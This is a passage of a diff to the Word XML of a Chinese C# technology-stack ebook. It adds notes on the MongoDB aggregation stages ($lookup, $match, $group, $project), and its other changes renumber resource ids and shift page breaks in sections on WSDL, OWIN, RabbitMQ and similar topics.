+        </w:rPr>
+        <w:t>是一个数组，其中包含多个对象（命令），通过遍历</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>PipeLine</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>数组对</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Collection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>中数据的操作</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>你可以调用一下的阶段（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>stages</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>）</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>$lookup</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：相当于左外连接，它的语法如下：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>$lookup:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>rom:&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>外联接的集合</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt;,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>localField:&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>连接的列名</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>&gt;,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>foreignField:&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>外联接的列名</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>&gt;,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>as:&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>输出的列名</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>$match</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：相当于过滤条件，它的语法如下：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>{ $match :{&lt;query&gt;}}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>$group</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：可以分</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>组来计算</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>出结果</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>$group:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>_id:&lt;expressing&gt;,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>&lt;field1&gt;:{&lt;accumulator1&gt;:&lt;expression1&gt;},</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>……</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>具体解释：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>xpression</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：我们可以使用“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>属性名”或“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>属性名</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>属性名</w:t>
+      </w:r>
+      <w:r>
+        <w:t>…</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>”来表示一个字段</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ccumulator</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：累计运算符有很多中，常见的有</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>$avg,$first,$last,$max,$min,$sum</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>等。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>$project</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：标记要显示的列名</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>$project:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>_id:0 or 1,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>&lt;field&gt;:0 or 1,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17331,7 +18220,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Web Services Description Language</w:t>
       </w:r>
       <w:r>
@@ -18052,6 +18940,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>是</w:t>
       </w:r>
       <w:r>
@@ -18738,7 +19627,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>结构型</w:t>
       </w:r>
     </w:p>
@@ -19296,6 +20184,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
             <wp:extent cx="5270500" cy="2172335"/>
@@ -19314,7 +20203,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15" cstate="print"/>
+                    <a:blip r:embed="rId16" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -19831,18 +20720,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>的区别</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>是：</w:t>
+        <w:t>的区别是：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20325,6 +21203,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>所以缓存</w:t>
       </w:r>
       <w:r>
@@ -20660,7 +21539,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16" cstate="print"/>
+                    <a:blip r:embed="rId17" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -20712,7 +21591,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId17" w:anchor="undefined" w:history="1">
+      <w:hyperlink r:id="rId18" w:anchor="undefined" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -20731,7 +21610,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId18" w:history="1">
+      <w:hyperlink r:id="rId19" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -20750,7 +21629,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId19" w:history="1">
+      <w:hyperlink r:id="rId20" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -21265,6 +22144,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>3</w:t>
       </w:r>
       <w:r>
@@ -21549,7 +22429,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId20" w:history="1">
+      <w:hyperlink r:id="rId21" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -21574,7 +22454,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId21" w:history="1">
+      <w:hyperlink r:id="rId22" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -22007,7 +22887,7 @@
           <w:szCs w:val="44"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId22" w:history="1">
+      <w:hyperlink r:id="rId23" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -22310,6 +23190,7 @@
           <w:szCs w:val="22"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>参考网址：</w:t>
       </w:r>
     </w:p>
@@ -22328,7 +23209,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId23" w:history="1">
+      <w:hyperlink r:id="rId24" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -22435,7 +23316,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24" cstate="print"/>
+                    <a:blip r:embed="rId25" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -22509,17 +23390,7 @@
           <w:sz w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>尽管可以使用Application.Lock()避免了冲突，但是它串行化了对Application的请求，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>会产生严重的性能瓶颈</w:t>
+        <w:t>尽管可以使用Application.Lock()避免了冲突，但是它串行化了对Application的请求，会产生严重的性能瓶颈</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -22564,7 +23435,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId25" w:history="1">
+      <w:hyperlink r:id="rId26" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -22589,7 +23460,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId26" w:history="1">
+      <w:hyperlink r:id="rId27" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -23408,7 +24279,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Prism - Brian Lagunas</w:t>
       </w:r>
       <w:r>
@@ -23835,6 +24705,7 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>平台</w:t>
       </w:r>
     </w:p>
@@ -24709,7 +25580,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>OWIN Layer(</w:t>
       </w:r>
       <w:r>
@@ -25030,6 +25900,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Microsoft.Owin.Host.HttpListener</w:t>
       </w:r>
     </w:p>
@@ -26151,7 +27022,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27" cstate="print"/>
+                    <a:blip r:embed="rId28" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -26218,7 +27089,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId28" cstate="print"/>
+                    <a:blip r:embed="rId29" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -35401,7 +36272,7 @@
         </w:rPr>
         <w:t>3.帕斯卡(</w:t>
       </w:r>
-      <w:hyperlink r:id="rId29" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
+      <w:hyperlink r:id="rId30" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -39422,7 +40293,7 @@
         </w:rPr>
         <w:t>，网址：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId30" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
+      <w:hyperlink r:id="rId31" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -41006,7 +41877,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId31" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId32" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -41222,7 +42093,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId32" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId33" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -41967,7 +42838,7 @@
         </w:rPr>
         <w:t>好了，访问</w:t>
       </w:r>
-      <w:hyperlink r:id="rId33" w:history="1">
+      <w:hyperlink r:id="rId34" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -54350,7 +55221,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0EFFC35D-7A10-46FA-8364-EA350509D9F0}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{17CD8282-49C5-417B-B84F-008B22D5A5ED}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -13350,12 +13350,13 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="37"/>
-        </w:numPr>
